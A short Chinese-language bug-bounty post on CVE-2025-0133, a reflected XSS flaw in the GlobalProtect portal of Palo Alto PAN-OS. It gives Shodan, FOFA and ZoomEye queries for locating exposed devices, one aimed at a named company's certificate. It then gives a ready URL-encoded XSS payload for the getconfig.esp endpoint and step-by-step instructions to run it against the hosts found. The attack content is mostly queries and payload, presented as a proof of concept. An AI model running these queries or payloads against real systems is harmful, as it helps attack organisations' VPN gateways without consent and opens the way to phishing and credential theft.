Bug Bounty CVE-2025–0133 PAN-OS: 反射型跨站脚本(XSS)“最常被利用漏洞”
Palo Alto Networks PAN-OS软件的GlobalProtect网关和门户功能中存在反射型跨站脚本(XSS)漏洞,当认证的Captive Portal用户点击特制链接时,可在其浏览器上下文中执行恶意JavaScript。主要风险是可能导致凭证窃取的钓鱼攻击——特别是在启用无客户端VPN的情况下。
🔍 在不同搜索引擎中查找该漏洞的方法
Shodan查询:
1
2
3
|
http.favicon.hash:-631559155
os:"PAN-OS"
ssl.cert.subject.CN:"redbull.com"
|
FOFA查询:
1
|
app="paloalto-GlobalProtect"
|
ZoomEye查询:
1
|
app:"Palo Alto Networks firewall httpd"
|
😈 漏洞利用POC
XSS载荷:
1
|
ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1–10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22Hex00%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=(empty_domain)&computer=computer
|
🚩 攻击步骤
步骤1: 使用Shodan或其他搜索引擎通过上述查询语句查找目标URL
步骤2: 打开其中一个URL,查找端点 /global-protect/login.esp/
步骤3: 使用XSS载荷进行测试:
1
|
/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1–10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22mitsec%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=(empty_domain)&computer=computer
|